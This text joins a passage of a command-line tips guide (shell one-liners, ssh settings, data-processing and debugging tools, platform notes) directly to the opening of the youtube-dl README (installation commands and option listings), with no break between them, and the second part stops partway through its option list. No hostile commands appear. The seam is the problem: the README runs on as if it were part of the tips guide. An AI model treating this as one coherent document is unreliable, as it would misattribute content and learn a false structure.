```bash { # Your code here } ``` - A "here document" allows [redirection of multiple lines of input](https://www.tldp.org/LDP/abs/html/here-docs.html) as if from a file: ``` cat <<EOF input on multiple lines EOF ``` - In Bash, redirect both standard output and standard error via: `some-command >logfile 2>&1` or `some-command &>logfile`. Often, to ensure a command does not leave an open file handle to standard input, tying it to the terminal you are in, it is also good practice to add `</dev/null`. - Use `man ascii` for a good ASCII table, with hex and decimal values. For general encoding info, `man unicode`, `man utf-8`, and `man latin1` are helpful. - Use `screen` or [`tmux`](https://tmux.github.io/) to multiplex the screen, especially useful on remote ssh sessions and to detach and re-attach to a session. `byobu` can enhance screen or tmux by providing more information and easier management. A more minimal alternative for session persistence only is [`dtach`](https://github.com/bogner/dtach). - In ssh, knowing how to port tunnel with `-L` or `-D` (and occasionally `-R`) is useful, e.g. to access web sites from a remote server. - It can be useful to make a few optimizations to your ssh configuration; for example, this `~/.ssh/config` contains settings to avoid dropped connections in certain network environments, uses compression (which is helpful with scp over low-bandwidth connections), and multiplex channels to the same server with a local control file: ``` TCPKeepAlive=yes ServerAliveInterval=15 ServerAliveCountMax=6 Compression=yes ControlMaster auto ControlPath /tmp/%r@%h:%p ControlPersist yes ``` - A few other options relevant to ssh are security sensitive and should be enabled with care, e.g. per subnet or host or in trusted networks: `StrictHostKeyChecking=no`, `ForwardAgent=yes` - Consider [`mosh`](https://mosh.org/) an alternative to ssh that uses UDP, avoiding dropped connections and adding convenience on the road (requires server-side setup). - To get the permissions on a file in octal form, which is useful for system configuration but not available in `ls` and easy to bungle, use something like ```sh stat -c '%A %a %n' /etc/timezone ``` - For interactive selection of values from the output of another command, use [`percol`](https://github.com/mooz/percol) or [`fzf`](https://github.com/junegunn/fzf). - For interaction with files based on the output of another command (like `git`), use `fpp` ([PathPicker](https://github.com/facebook/PathPicker)). - For a simple web server for all files in the current directory (and subdirs), available to anyone on your network, use: `python -m SimpleHTTPServer 7777` (for port 7777 and Python 2) and `python -m http.server 7777` (for port 7777 and Python 3). - For running a command as another user, use `sudo`. Defaults to running as root; use `-u` to specify another user. Use `-i` to login as that user (you will be asked for _your_ password). - For switching the shell to another user, use `su username` or `su - username`. The latter with "-" gets an environment as if another user just logged in. Omitting the username defaults to root. You will be asked for the password _of the user you are switching to_. - Know about the [128K limit](https://wiki.debian.org/CommonErrorMessages/ArgumentListTooLong) on command lines. This "Argument list too long" error is common when wildcard matching large numbers of files. (When this happens alternatives like `find` and `xargs` may help.) - For a basic calculator (and of course access to Python in general), use the `python` interpreter. For example, ``` >>> 2+3 5 ``` ## Processing files and data - To locate a file by name in the current directory, `find . -iname '*something*'` (or similar). To find a file anywhere by name, use `locate something` (but bear in mind `updatedb` may not have indexed recently created files). - For general searching through source or data files, there are several options more advanced or faster than `grep -r`, including (in rough order from older to newer) [`ack`](https://github.com/beyondgrep/ack2), [`ag`](https://github.com/ggreer/the_silver_searcher) ("the silver searcher"), and [`rg`](https://github.com/BurntSushi/ripgrep) (ripgrep). - To convert HTML to text: `lynx -dump -stdin` - For Markdown, HTML, and all kinds of document conversion, try [`pandoc`](http://pandoc.org/). For example, to convert a Markdown document to Word format: `pandoc README.md --from markdown --to docx -o temp.docx` - If you must handle XML, `xmlstarlet` is old but good. - For JSON, use [`jq`](http://stedolan.github.io/jq/). For interactive use, also see [`jid`](https://github.com/simeji/jid) and [`jiq`](https://github.com/fiatjaf/jiq). - For YAML, use [`shyaml`](https://github.com/0k/shyaml). - For Excel or CSV files, [csvkit](https://github.com/onyxfish/csvkit) provides `in2csv`, `csvcut`, `csvjoin`, `csvgrep`, etc. - For Amazon S3, [`s3cmd`](https://github.com/s3tools/s3cmd) is convenient and [`s4cmd`](https://github.com/bloomreach/s4cmd) is faster. Amazon's [`aws`](https://github.com/aws/aws-cli) and the improved [`saws`](https://github.com/donnemartin/saws) are essential for other AWS-related tasks. - Know about `sort` and `uniq`, including uniq's `-u` and `-d` options -- see one-liners below. See also `comm`. - Know about `cut`, `paste`, and `join` to manipulate text files. Many people use `cut` but forget about `join`. - Know about `wc` to count newlines (`-l`), characters (`-m`), words (`-w`) and bytes (`-c`). - Know about `tee` to copy from stdin to a file and also to stdout, as in `ls -al | tee file.txt`. - For more complex calculations, including grouping, reversing fields, and statistical calculations, consider [`datamash`](https://www.gnu.org/software/datamash/). - Know that locale affects a lot of command line tools in subtle ways, including sorting order (collation) and performance. Most Linux installations will set `LANG` or other locale variables to a local setting like US English. But be aware sorting will change if you change locale. And know i18n routines can make sort or other commands run *many times* slower. In some situations (such as the set operations or uniqueness operations below) you can safely ignore slow i18n routines entirely and use traditional byte-based sort order, using `export LC_ALL=C`. - You can set a specific command's environment by prefixing its invocation with the environment variable settings, as in `TZ=Pacific/Fiji date`. - Know basic `awk` and `sed` for simple data munging. See [One-liners](#one-liners) for examples. - To replace all occurrences of a string in place, in one or more files: ```sh perl -pi.bak -e 's/old-string/new-string/g' my-files-*.txt ``` - To rename multiple files and/or search and replace within files, try [`repren`](https://github.com/jlevy/repren). (In some cases the `rename` command also allows multiple renames, but be careful as its functionality is not the same on all Linux distributions.) ```sh # Full rename of filenames, directories, and contents foo -> bar: repren --full --preserve-case --from foo --to bar . # Recover backup files whatever.bak -> whatever: repren --renames --from '(.*)\.bak' --to '\1' *.bak # Same as above, using rename, if available: rename 's/\.bak$//' *.bak ``` - As the man page says, `rsync` really is a fast and extraordinarily versatile file copying tool. It's known for synchronizing between machines but is equally useful locally. When security restrictions allow, using `rsync` instead of `scp` allows recovery of a transfer without restarting from scratch. It also is among the [fastest ways](https://web.archive.org/web/20130929001850/http://linuxnote.net/jianingy/en/linux/a-fast-way-to-remove-huge-number-of-files.html) to delete large numbers of files: ```sh mkdir empty && rsync -r --delete empty/ some-dir && rmdir some-dir ``` - For monitoring progress when processing files, use [`pv`](http://www.ivarch.com/programs/pv.shtml), [`pycp`](https://github.com/dmerejkowsky/pycp), [`pmonitor`](https://github.com/dspinellis/pmonitor), [`progress`](https://github.com/Xfennec/progress), `rsync --progress`, or, for block-level copying, `dd status=progress`. - Use `shuf` to shuffle or select random lines from a file. - Know `sort`'s options. For numbers, use `-n`, or `-h` for handling human-readable numbers (e.g. from `du -h`). Know how keys work (`-t` and `-k`). In particular, watch out that you need to write `-k1,1` to sort by only the first field; `-k1` means sort according to the whole line. Stable sort (`sort -s`) can be useful. For example, to sort first by field 2, then secondarily by field 1, you can use `sort -k1,1 | sort -s -k2,2`. - If you ever need to write a tab literal in a command line in Bash (e.g. for the -t argument to sort), press **ctrl-v** **[Tab]** or write `$'\t'` (the latter is better as you can copy/paste it). - The standard tools for patching source code are `diff` and `patch`. See also `diffstat` for summary statistics of a diff and `sdiff` for a side-by-side diff. Note `diff -r` works for entire directories. Use `diff -r tree1 tree2 | diffstat` for a summary of changes. Use `vimdiff` to compare and edit files. - For binary files, use `hd`, `hexdump` or `xxd` for simple hex dumps and `bvi`, `hexedit` or `biew` for binary editing. - Also for binary files, `strings` (plus `grep`, etc.) lets you find bits of text. - For binary diffs (delta compression), use `xdelta3`. - To convert text encodings, try `iconv`. Or `uconv` for more advanced use; it supports some advanced Unicode things. For example: ```sh # Displays hex codes or actual names of characters (useful for debugging): uconv -f utf-8 -t utf-8 -x '::Any-Hex;' < input.txt uconv -f utf-8 -t utf-8 -x '::Any-Name;' < input.txt # Lowercase and removes all accents (by expanding and dropping them): uconv -f utf-8 -t utf-8 -x '::Any-Lower; ::Any-NFD; [:Nonspacing Mark:] >; ::Any-NFC;' < input.txt > output.txt ``` - To split files into pieces, see `split` (to split by size) and `csplit` (to split by a pattern). - Date and time: To get the current date and time in the helpful [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) format, use `date -u +"%Y-%m-%dT%H:%M:%SZ"` (other options [are](https://stackoverflow.com/questions/7216358/date-command-on-os-x-doesnt-have-iso-8601-i-option) [problematic](https://unix.stackexchange.com/questions/164826/date-command-iso-8601-option)). To manipulate date and time expressions, use `dateadd`, `datediff`, `strptime` etc. from [`dateutils`](http://www.fresse.org/dateutils/). - Use `zless`, `zmore`, `zcat`, and `zgrep` to operate on compressed files. - File attributes are settable via `chattr` and offer a lower-level alternative to file permissions. For example, to protect against accidental file deletion the immutable flag: `sudo chattr +i /critical/directory/or/file` - Use `getfacl` and `setfacl` to save and restore file permissions. For example: ```sh getfacl -R /some/path > permissions.txt setfacl --restore=permissions.txt ``` - To create empty files quickly, use `truncate` (creates [sparse file](https://en.wikipedia.org/wiki/Sparse_file)), `fallocate` (ext4, xfs, btrfs and ocfs2 filesystems), `xfs_mkfile` (almost any filesystems, comes in xfsprogs package), `mkfile` (for Unix-like systems like Solaris, Mac OS). ## System debugging - For web debugging, `curl` and `curl -I` are handy, or their `wget` equivalents, or the more modern [`httpie`](https://github.com/jkbrzt/httpie). - To know current cpu/disk status, the classic tools are `top` (or the better `htop`), `iostat`, and `iotop`. Use `iostat -mxz 15` for basic CPU and detailed per-partition disk stats and performance insight. - For network connection details, use `netstat` and `ss`. - For a quick overview of what's happening on a system, `dstat` is especially useful. For broadest overview with details, use [`glances`](https://github.com/nicolargo/glances). - To know memory status, run and understand the output of `free` and `vmstat`. In particular, be aware the "cached" value is memory held by the Linux kernel as file cache, so effectively counts toward the "free" value. - Java system debugging is a different kettle of fish, but a simple trick on Oracle's and some other JVMs is that you can run `kill -3 <pid>` and a full stack trace and heap summary (including generational garbage collection details, which can be highly informative) will be dumped to stderr/logs. The JDK's `jps`, `jstat`, `jstack`, `jmap` are useful. [SJK tools](https://github.com/aragozin/jvm-tools) are more advanced. - Use [`mtr`](http://www.bitwizard.nl/mtr/) as a better traceroute, to identify network issues. - For looking at why a disk is full, [`ncdu`](https://dev.yorhel.nl/ncdu) saves time over the usual commands like `du -sh *`. - To find which socket or process is using bandwidth, try [`iftop`](http://www.ex-parrot.com/~pdw/iftop/) or [`nethogs`](https://github.com/raboof/nethogs). - The `ab` tool (comes with Apache) is helpful for quick-and-dirty checking of web server performance. For more complex load testing, try `siege`. - For more serious network debugging, [`wireshark`](https://wireshark.org/), [`tshark`](https://www.wireshark.org/docs/wsug_html_chunked/AppToolstshark.html), or [`ngrep`](http://ngrep.sourceforge.net/). - Know about `strace` and `ltrace`. These can be helpful if a program is failing, hanging, or crashing, and you don't know why, or if you want to get a general idea of performance. Note the profiling option (`-c`), and the ability to attach to a running process (`-p`). Use trace child option (`-f`) to avoid missing important calls. - Know about `ldd` to check shared libraries etc — but [never run it on untrusted files](http://www.catonmat.net/blog/ldd-arbitrary-code-execution/). - Know how to connect to a running process with `gdb` and get its stack traces. - Use `/proc`. It's amazingly helpful sometimes when debugging live problems. Examples: `/proc/cpuinfo`, `/proc/meminfo`, `/proc/cmdline`, `/proc/xxx/cwd`, `/proc/xxx/exe`, `/proc/xxx/fd/`, `/proc/xxx/smaps` (where `xxx` is the process id or pid). - When debugging why something went wrong in the past, [`sar`](http://sebastien.godard.pagesperso-orange.fr/) can be very helpful. It shows historic statistics on CPU, memory, network, etc. - For deeper systems and performance analyses, look at `stap` ([SystemTap](https://sourceware.org/systemtap/wiki)), [`perf`](https://en.wikipedia.org/wiki/Perf_%28Linux%29), and [`sysdig`](https://github.com/draios/sysdig). - Check what OS you're on with `uname` or `uname -a` (general Unix/kernel info) or `lsb_release -a` (Linux distro info). - Use `dmesg` whenever something's acting really funny (it could be hardware or driver issues). - If you delete a file and it doesn't free up expected disk space as reported by `du`, check whether the file is in use by a process: `lsof | grep deleted | grep "filename-of-my-big-file"` ## One-liners A few examples of piecing together commands: - It is remarkably helpful sometimes that you can do set intersection, union, and difference of text files via `sort`/`uniq`. Suppose `a` and `b` are text files that are already uniqued. This is fast, and works on files of arbitrary size, up to many gigabytes. (Sort is not limited by memory, though you may need to use the `-T` option if `/tmp` is on a small root partition.) See also the note about `LC_ALL` above and `sort`'s `-u` option (left out for clarity below). ```sh sort a b | uniq > c # c is a union b sort a b | uniq -d > c # c is a intersect b sort a b b | uniq -u > c # c is set difference a - b ``` - Pretty-print two JSON files, normalizing their syntax, then coloring and paginating the result: ``` diff <(jq --sort-keys . < file1.json) <(jq --sort-keys . < file2.json) | colordiff | less -R ``` - Use `grep . *` to quickly examine the contents of all files in a directory (so each line is paired with the filename), or `head -100 *` (so each file has a heading). This can be useful for directories filled with config settings like those in `/sys`, `/proc`, `/etc`. - Summing all numbers in the third column of a text file (this is probably 3X faster and 3X less code than equivalent Python): ```sh awk '{ x += $3 } END { print x }' myfile ``` - To see sizes/dates on a tree of files, this is like a recursive `ls -l` but is easier to read than `ls -lR`: ```sh find . -type f -ls ``` - Say you have a text file, like a web server log, and a certain value that appears on some lines, such as an `acct_id` parameter that is present in the URL. If you want a tally of how many requests for each `acct_id`: ```sh egrep -o 'acct_id=[0-9]+' access.log | cut -d= -f2 | sort | uniq -c | sort -rn ``` - To continuously monitor changes, use `watch`, e.g. check changes to files in a directory with `watch -d -n 2 'ls -rtlh | tail'` or to network settings while troubleshooting your wifi settings with `watch -d -n 2 ifconfig`. - Run this function to get a random tip from this document (parses Markdown and extracts an item): ```sh function taocl() { curl -s https://raw.githubusercontent.com/jlevy/the-art-of-command-line/master/README.md | sed '/cowsay[.]png/d' | pandoc -f markdown -t html | xmlstarlet fo --html --dropdtd | xmlstarlet sel -t -v "(html/body/ul/li[count(p)>0])[$RANDOM mod last()+1]" | xmlstarlet unesc | fmt -80 | iconv -t US } ``` ## Obscure but useful - `expr`: perform arithmetic or boolean operations or evaluate regular expressions - `m4`: simple macro processor - `yes`: print a string a lot - `cal`: nice calendar - `env`: run a command (useful in scripts) - `printenv`: print out environment variables (useful in debugging and scripts) - `look`: find English words (or lines in a file) beginning with a string - `cut`, `paste` and `join`: data manipulation - `fmt`: format text paragraphs - `pr`: format text into pages/columns - `fold`: wrap lines of text - `column`: format text fields into aligned, fixed-width columns or tables - `expand` and `unexpand`: convert between tabs and spaces - `nl`: add line numbers - `seq`: print numbers - `bc`: calculator - `factor`: factor integers - [`gpg`](https://gnupg.org/): encrypt and sign files - `toe`: table of terminfo entries - `nc`: network debugging and data transfer - `socat`: socket relay and tcp port forwarder (similar to `netcat`) - [`slurm`](https://github.com/mattthias/slurm): network traffic visualization - `dd`: moving data between files or devices - `file`: identify type of a file - `tree`: display directories and subdirectories as a nesting tree; like `ls` but recursive - `stat`: file info - `time`: execute and time a command - `timeout`: execute a command for specified amount of time and stop the process when the specified amount of time completes. - `lockfile`: create semaphore file that can only be removed by `rm -f` - `logrotate`: rotate, compress and mail logs. - `watch`: run a command repeatedly, showing results and/or highlighting changes - [`when-changed`](https://github.com/joh/when-changed): runs any command you specify whenever it sees file changed. See `inotifywait` and `entr` as well. - `tac`: print files in reverse - `comm`: compare sorted files line by line - `strings`: extract text from binary files - `tr`: character translation or manipulation - `iconv` or `uconv`: conversion for text encodings - `split` and `csplit`: splitting files - `sponge`: read all input before writing it, useful for reading from then writing to the same file, e.g., `grep -v something some-file | sponge some-file` - `units`: unit conversions and calculations; converts furlongs per fortnight to twips per blink (see also `/usr/share/units/definitions.units`) - `apg`: generates random passwords - `xz`: high-ratio file compression - `ldd`: dynamic library info - `nm`: symbols from object files - `ab` or [`wrk`](https://github.com/wg/wrk): benchmarking web servers - `strace`: system call debugging - [`mtr`](http://www.bitwizard.nl/mtr/): better traceroute for network debugging - `cssh`: visual concurrent shell - `rsync`: sync files and folders over SSH or in local file system - [`wireshark`](https://wireshark.org/) and [`tshark`](https://www.wireshark.org/docs/wsug_html_chunked/AppToolstshark.html): packet capture and network debugging - [`ngrep`](http://ngrep.sourceforge.net/): grep for the network layer - `host` and `dig`: DNS lookups - `lsof`: process file descriptor and socket info - `dstat`: useful system stats - [`glances`](https://github.com/nicolargo/glances): high level, multi-subsystem overview - `iostat`: Disk usage stats - `mpstat`: CPU usage stats - `vmstat`: Memory usage stats - `htop`: improved version of top - `last`: login history - `w`: who's logged on - `id`: user/group identity info - [`sar`](http://sebastien.godard.pagesperso-orange.fr/): historic system stats - [`iftop`](http://www.ex-parrot.com/~pdw/iftop/) or [`nethogs`](https://github.com/raboof/nethogs): network utilization by socket or process - `ss`: socket statistics - `dmesg`: boot and system error messages - `sysctl`: view and configure Linux kernel parameters at run time - `hdparm`: SATA/ATA disk manipulation/performance - `lsblk`: list block devices: a tree view of your disks and disk partitions - `lshw`, `lscpu`, `lspci`, `lsusb`, `dmidecode`: hardware information, including CPU, BIOS, RAID, graphics, devices, etc. - `lsmod` and `modinfo`: List and show details of kernel modules. - `fortune`, `ddate`, and `sl`: um, well, it depends on whether you consider steam locomotives and Zippy quotations "useful" ## macOS only These are items relevant *only* on macOS. - Package management with `brew` (Homebrew) and/or `port` (MacPorts). These can be used to install on macOS many of the above commands. - Copy output of any command to a desktop app with `pbcopy` and paste input from one with `pbpaste`. - To enable the Option key in macOS Terminal as an alt key (such as used in the commands above like **alt-b**, **alt-f**, etc.), open Preferences -> Profiles -> Keyboard and select "Use Option as Meta key". - To open a file with a desktop app, use `open` or `open -a /Applications/Whatever.app`. - Spotlight: Search files with `mdfind` and list metadata (such as photo EXIF info) with `mdls`. - Be aware macOS is based on BSD Unix, and many commands (for example `ps`, `ls`, `tail`, `awk`, `sed`) have many subtle variations from Linux, which is largely influenced by System V-style Unix and GNU tools. You can often tell the difference by noting a man page has the heading "BSD General Commands Manual." In some cases GNU versions can be installed, too (such as `gawk` and `gsed` for GNU awk and sed). If writing cross-platform Bash scripts, avoid such commands (for example, consider Python or `perl`) or test carefully. - To get macOS release information, use `sw_vers`. ## Windows only These items are relevant *only* on Windows. ### Ways to obtain Unix tools under Windows - Access the power of the Unix shell under Microsoft Windows by installing [Cygwin](https://cygwin.com/). Most of the things described in this document will work out of the box. - On Windows 10, you can use [Windows Subsystem for Linux (WSL)](https://msdn.microsoft.com/commandline/wsl/about), which provides a familiar Bash environment with Unix command line utilities. - If you mainly want to use GNU developer tools (such as GCC) on Windows, consider [MinGW](http://www.mingw.org/) and its [MSYS](http://www.mingw.org/wiki/msys) package, which provides utilities such as bash, gawk, make and grep. MSYS doesn't have all the features compared to Cygwin. MinGW is particularly useful for creating native Windows ports of Unix tools. - Another option to get Unix look and feel under Windows is [Cash](https://github.com/dthree/cash). Note that only very few Unix commands and command-line options are available in this environment. ### Useful Windows command-line tools - You can perform and script most Windows system administration tasks from the command line by learning and using `wmic`. - Native command-line Windows networking tools you may find useful include `ping`, `ipconfig`, `tracert`, and `netstat`. - You can perform [many useful Windows tasks](http://www.thewindowsclub.com/rundll32-shortcut-commands-windows) by invoking the `Rundll32` command. ### Cygwin tips and tricks - Install additional Unix programs with the Cygwin's package manager. - Use `mintty` as your command-line window. - Access the Windows clipboard through `/dev/clipboard`. - Run `cygstart` to open an arbitrary file through its registered application. - Access the Windows registry with `regtool`. - Note that a `C:\` Windows drive path becomes `/cygdrive/c` under Cygwin, and that Cygwin's `/` appears under `C:\cygwin` on Windows. Convert between Cygwin and Windows-style file paths with `cygpath`. This is most useful in scripts that invoke Windows programs. ## More resources - [awesome-shell](https://github.com/alebcay/awesome-shell): A curated list of shell tools and resources. - [awesome-osx-command-line](https://github.com/herrbischoff/awesome-osx-command-line): A more in-depth guide for the macOS command line. - [Strict mode](http://redsymbol.net/articles/unofficial-bash-strict-mode/) for writing better shell scripts. - [shellcheck](https://github.com/koalaman/shellcheck): A shell script static analysis tool. Essentially, lint for bash/sh/zsh. - [Filenames and Pathnames in Shell](http://www.dwheeler.com/essays/filenames-in-shell.html): The sadly complex minutiae on how to handle filenames correctly in shell scripts. - [Data Science at the Command Line](http://datascienceatthecommandline.com/#tools): More commands and tools helpful for doing data science, from the book of the same name ## Disclaimer With the exception of very small tasks, code is written so others can read it. With power comes responsibility. The fact you *can* do something in Bash doesn't necessarily mean you should! ;) ## License [![Creative Commons License](https://i.creativecommons.org/l/by-sa/4.0/88x31.png)](http://creativecommons.org/licenses/by-sa/4.0/) This work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-sa/4.0/).
[![Build Status](https://github.com/ytdl-org/youtube-dl/workflows/CI/badge.svg)](https://github.com/ytdl-org/youtube-dl/actions?query=workflow%3ACI) youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [OPTIONS](#options) - [CONFIGURATION](#configuration) - [OUTPUT TEMPLATE](#output-template) - [FORMAT SELECTION](#format-selection) - [VIDEO SELECTION](#video-selection) - [FAQ](#faq) - [DEVELOPER INSTRUCTIONS](#developer-instructions) - [EMBEDDING YOUTUBE-DL](#embedding-youtube-dl) - [BUGS](#bugs) - [COPYRIGHT](#copyright) # INSTALLATION To install it right away for all UNIX users (Linux, macOS, etc.), type: sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl If you do not have curl, you can alternatively use a recent wget: sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl Windows users can [download an .exe file](https://yt-dl.org/latest/youtube-dl.exe) and place it in any location on their [PATH](https://en.wikipedia.org/wiki/PATH_%28variable%29) except for `%SYSTEMROOT%\System32` (e.g. **do not** put in `C:\Windows\System32`). You can also use pip: sudo -H pip install --upgrade youtube-dl This command will update youtube-dl if you have already installed it. See the [pypi page](https://pypi.python.org/pypi/youtube_dl) for more information. macOS users can install youtube-dl with [Homebrew](https://brew.sh/): brew install youtube-dl Or with [MacPorts](https://www.macports.org/): sudo port install youtube-dl Alternatively, refer to the [developer instructions](#developer-instructions) for how to check out and work with the git repository. For further options, including PGP signatures, see the [youtube-dl Download Page](https://ytdl-org.github.io/youtube-dl/download.html). # DESCRIPTION **youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like. youtube-dl [OPTIONS] URL [URL...] # OPTIONS -h, --help Print this help text and exit --version Print program version and exit -U, --update Update this program to latest version. Make sure that you have sufficient permissions (run with sudo if needed) -i, --ignore-errors Continue on download errors, for example to skip unavailable videos in a playlist --abort-on-error Abort downloading of further videos (in the playlist or the command line) if an error occurs --dump-user-agent Display the current browser identification --list-extractors List all supported extractors --extractor-descriptions Output descriptions of all supported extractors --force-generic-extractor Force extraction to use the generic extractor --default-search PREFIX Use this prefix for unqualified URLs. For example "gvsearch2:" downloads two videos from google videos for youtube-dl "large apple". Use the value "auto" to let youtube-dl guess ("auto_warning" to emit a warning when guessing). "error" just throws an error. The default value "fixup_error" repairs broken URLs, but emits an error if this is not possible instead of searching. --ignore-config Do not read configuration files. When given in the global configuration file /etc/youtube-dl.conf: Do not read the user configuration in ~/.config/youtube- dl/config (%APPDATA%/youtube-dl/config.txt on Windows) --config-location PATH Location of the configuration file; either the path to the config or its containing directory. --flat-playlist Do not extract the videos of a playlist, only list them. --mark-watched Mark videos watched (YouTube only) --no-mark-watched Do not mark videos watched (YouTube only) --no-color Do not emit color codes in output ## Network Options: --proxy URL Use the specified HTTP/HTTPS/SOCKS proxy. To enable SOCKS proxy, specify a proper scheme. For example socks5://127.0.0.1:1080/. Pass in an empty string (--proxy "") for direct connection --socket-timeout SECONDS Time to wait before giving up, in seconds --source-address IP Client-side IP address to bind to -4, --force-ipv4 Make all connections via IPv4 -6, --force-ipv6 Make all connections via IPv6 ## Geo Restriction: --geo-verification-proxy URL Use this proxy to verify the IP address for some geo-restricted sites. The default proxy specified by --proxy (or none, if the option is not present) is used for the actual downloading. --geo-bypass Bypass geographic restriction via faking X-Forwarded-For HTTP header --no-geo-bypass Do not bypass geographic restriction via faking X-Forwarded-For HTTP header --geo-bypass-country CODE Force bypass geographic restriction with explicitly provided two-letter ISO 3166-2 country code --geo-bypass-ip-block IP_BLOCK Force bypass geographic restriction with explicitly provided IP block in CIDR notation ## Video Selection: --playlist-start NUMBER Playlist video to start at (default is 1) --playlist-end NUMBER Playlist video to end at (default is last) --playlist-items ITEM_SPEC Playlist video items to download. Specify indices of the videos in the playlist separated by commas like: "--playlist-items 1,2,5,8" if you want to download videos indexed 1, 2, 5, 8 in the playlist. You can specify range: "--playlist-items 1-3,7,10-13", it will download the videos at index 1, 2, 3, 7, 10, 11, 12 and 13. --match-title REGEX Download only matching titles (regex or caseless sub-string) --reject-title REGEX Skip download for matching titles (regex or caseless sub-string) --max-downloads NUMBER Abort after downloading NUMBER files --min-filesize SIZE Do not download any videos smaller than SIZE (e.g. 50k or 44.6m) --max-filesize SIZE Do not download any videos larger than SIZE (e.g. 50k or 44.6m) --date DATE Download only videos uploaded in this date --datebefore DATE Download only videos uploaded on or before this date (i.e. inclusive) --dateafter DATE Download only videos uploaded on or after this date (i.e. inclusive) --min-views COUNT Do not download any videos with less than COUNT views --max-views COUNT Do not download any videos with more than COUNT views --match-filter FILTER Generic video filter. Specify any key (see the "OUTPUT TEMPLATE" for a list of available keys) to match if the key is present, !key to check if the key is not present, key > NUMBER (like "comment_count > 12", also works with >=, <, <=, !=, =) to compare against a number, key = 'LITERAL' (like "uploader = 'Mike Smith'", also works with !=) to match against a string literal and & to require multiple matches. Values which are not known are excluded unless you put a question mark (?) after the operator. For example, to only match videos that have been liked more than 100 times and disliked less than 50 times (or the dislike functionality is not available at the given service), but who also have a description, use --match-filter "like_count > 100 & dislike_count <? 50 & description" . --no-playlist Download only the video, if the URL refers to a video and a playlist. --yes-playlist Download the playlist, if the URL refers to a video and a playlist. --age-limit YEARS Download only videos suitable for the given age --download-archive FILE Download only videos not listed in the archive file. Record the IDs of all downloaded videos in it. --include-ads Download advertisements as well (experimental) ## Download Options: -r, --limit-rate RATE Maximum download rate in bytes per second (e.g. 50K or 4.2M) -R, --retries RETRIES Number of retries (default is 10), or "infinite". --fragment-retries RETRIES Number of retries for a fragment (default is 10), or "infinite" (DASH, hlsnative and ISM) --skip-unavailable-fragments Skip unavailable fragments (DASH, hlsnative and ISM) --abort-on-unavailable-fragment Abort downloading when some fragment is not available --keep-fragments Keep downloaded fragments on disk after downloading is finished; fragments are erased by default --buffer-size SIZE Size of download buffer (e.g. 1024 or 16K) (default is 1024) --no-resize-buffer Do not automatically adjust the buffer size. By default, the buffer size is automatically resized from an initial value of SIZE. --http-chunk-size SIZE Size of a chunk for chunk-based HTTP downloading (e.g. 10485760 or 10M) (default is disabled). May be useful for bypassing bandwidth throttling imposed by a webserver (experimental) --playlist-reverse Download playlist videos in reverse order --playlist-random Download playlist videos in random order --xattr-set-filesize Set file xattribute ytdl.filesize with expected file size --hls-prefer-native Use the native HLS downloader instead of ffmpeg --hls-prefer-ffmpeg Use ffmpeg instead of the native HLS downloader --hls-use-mpegts Use the mpegts container for HLS videos, allowing to play the video while downloading (some players may not be able to play it) --external-downloader COMMAND Use the specified external downloader. Currently supports aria2c,avconv,axel,curl,ffmpeg,httpie,wget --external-downloader-args ARGS Give these arguments to the external downloader ## Filesystem Options: -a, --batch-file FILE File containing URLs to download ('-' for stdin), one URL per line. Lines starting with '#', ';' or ']' are considered as comments and ignored. --id Use only video ID in file name -o, --output TEMPLATE Output filename template, see the "OUTPUT TEMPLATE" for all the info --autonumber-start NUMBER Specify the start value for %(autonumber)s (default is 1) --restrict-filenames Restrict filenames to only ASCII characters, and avoid "&" and spaces in filenames -w, --no-overwrites Do not overwrite files -c, --continue Force resume of partially downloaded files. By default, youtube-dl will resume downloads if possible. --no-continue Do not resume partially downloaded files (restart from beginning) --no-part Do not use .part files - write directly into output file --no-mtime Do not use the Last-modified header to set the file modification time --write-description Write video description to a .description file --write-info-json Write video metadata to a .info.json file --write-annotations Write video annotations to a .annotations.xml file --load-info-json FILE JSON file containing the video information (created with the "--write-info-json" option) --cookies FILE File to read cookies from and dump cookie jar in --cache-dir DIR Location in the filesystem where youtube-dl can store some downloaded information permanently. By default $XDG_CACHE_HOME/youtube-dl or ~/.cache/youtube-dl . At the moment, only YouTube player files (for videos with obfuscated signatures) are cached, but that may change. --no-cache-dir Disable filesystem caching --rm-cache-dir Delete all filesystem cache files ## Thumbnail images: --write-thumbnail Write thumbnail image to disk --write-all-thumbnails Write all thumbnail image formats to disk --list-thumbnails Simulate and list all available thumbnail formats ## Verbosity / Simulation Options: -q, --quiet Activate quiet mode --no-warnings Ignore warnings -s, --simulate Do not download the video and do not write anything to disk --skip-download Do not download the video -g, --get-url Simulate, quiet but print URL -e, --get-title Simulate, quiet but print title --get-id Simulate, quiet but print id --get-thumbnail Simulate, quiet but print thumbnail URL --get-description Simulate, quiet but print video description --get-duration Simulate, quiet but print video length --get-filename Simulate, quiet but print output filename --get-format Simulate, quiet but print output format -j, --dump-json Simulate, quiet but print JSON information. See the "OUTPUT TEMPLATE" for a description of available keys. -J, --dump-single-json Simulate, quiet but print JSON information for each command-line argument. If the URL refers to a playlist, dump the whole playlist information in a single line. --print-json Be quiet and print the video information as JSON (video is still being downloaded). --newline Output progress bar as new lines --no-progress Do not print progress bar --console-title Display progress in console titlebar -v, --verbose Print various debugging information --dump-pages Print downloaded pages encoded using base64 to debug problems (very verbose) --write-pages Write downloaded intermediary pages to files in the current directory to debug problems --print-traffic Display sent and read HTTP traffic -C, --call-home Contact the youtube-dl server for debugging --no-call-home Do NOT contact the youtube-dl server for debugging ## Workarounds: --encoding ENCODING Force the specified encoding (experimental) --no-check-certificate Suppress HTTPS certificate validation --prefer-insecure Use an unencrypted connection to retrieve information about the video. (Currently supported only for YouTube) --user-agent UA Specify a custom user agent --referer URL Specify a custom referer, use if the video access is restricted to one domain --add-header FIELD:VALUE Specify a custom HTTP header and its value, separated by a colon ':'. You can use this option multiple times --bidi-workaround Work around terminals that lack bidirectional text support. Requires bidiv or fribidi executable in PATH 